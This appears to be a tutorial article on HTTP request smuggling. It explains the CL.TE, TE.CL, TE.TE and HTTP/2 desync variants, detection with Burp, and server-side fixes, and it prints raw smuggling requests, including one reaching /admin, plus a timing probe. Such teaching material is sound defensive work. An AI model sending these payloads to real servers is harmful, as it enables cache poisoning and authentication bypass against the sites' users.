HTTP Request Smuggling: CL.TE, TE.CL, HTTP/2 Desync

Last updated: April 26, 2026

HTTP Request Smuggling exploits the gap between how front-end and back-end servers parse the boundaries of HTTP requests. James Kettle’s Black Hat 2019 research turned this into a mainstream attack class. In 2026, request smuggling continues to find production targets — load balancers, CDNs, reverse proxies. This article covers the variants, testing, and the architectural fixes.

The mechanism

HTTP requests can specify body length two ways: Content-Length header, or Transfer-Encoding: chunked. RFC says servers must reject requests with both. In practice, front-end and back-end often disagree on which one to honour. The attacker sends a request both servers parse differently — front-end sees one request, back-end sees two.

The variants

CL.TE (Content-Length / Transfer-Encoding)

POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

Front-end honours Content-Length (13), forwards entire body. Back-end honours Transfer-Encoding (chunked), sees 0-length terminator, treats “SMUGGLED” as the start of next request.

TE.CL

POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

8c
GET /admin HTTP/1.1
Host: target.com

0

Front-end honours TE; back-end honours CL — first 4 bytes consumed; rest treated as new request.

TE.TE (with obfuscation)

POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Transfer-Encoding: x  ← obfuscated header

0

GET /admin HTTP/1.1
Host: target.com

One server processes the chunked TE; the other doesn’t recognise the obfuscated form and falls back to CL behaviour.

HTTP/2 desync

If front-end speaks HTTP/2 but back-end is HTTP/1.1, translation gaps create new smuggling primitives. Modern variant explored heavily 2021-2024.

What attackers do with smuggling

• Cache poisoning — smuggle a request whose response is cached and served to other users
• Authentication bypass — smuggle requests with attacker headers, inheriting victim’s session
• Forwarding to internal endpoints — admin paths accessible only behind specific headers
• Reflected XSS via cache poisoning — store XSS payload in cache for all users

Detection workflow

# Burp Pro's HTTP Request Smuggler extension automates testing
# Right-click request → Smuggler → Launch attack → all variants tested

# Manual probe:
# Send timing-attack version - if server takes longer than baseline, smuggling likely
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Content-Length: 4

1
A
X
# Front-end TE: sees 1-byte chunk "A", expects more
# Back-end CL: sees 4 bytes, processes
# Timing differences reveal which

The fix

• Use HTTP/2 end-to-end — eliminates much of the bug class
• Reject requests with both CL and TE headers
• Back-end and front-end use same HTTP parser library
• WAF rules for malformed TE headers
• Disable connection reuse on the front-end if back-end is suspect

Real-world impact

Major 2019-2024 disclosures affected Cloudflare, Akamai, AWS ALB, F5 BIG-IP, various CDN configurations. Each was patched but custom configurations on these products often re-introduce variants.

The takeaway

HTTP request smuggling is a CDN / load-balancer / reverse-proxy bug class. Test with Burp’s Smuggler. Move to HTTP/2 end-to-end where possible. Reject malformed CL+TE combinations at edge. The bug class is rare but high-impact when present.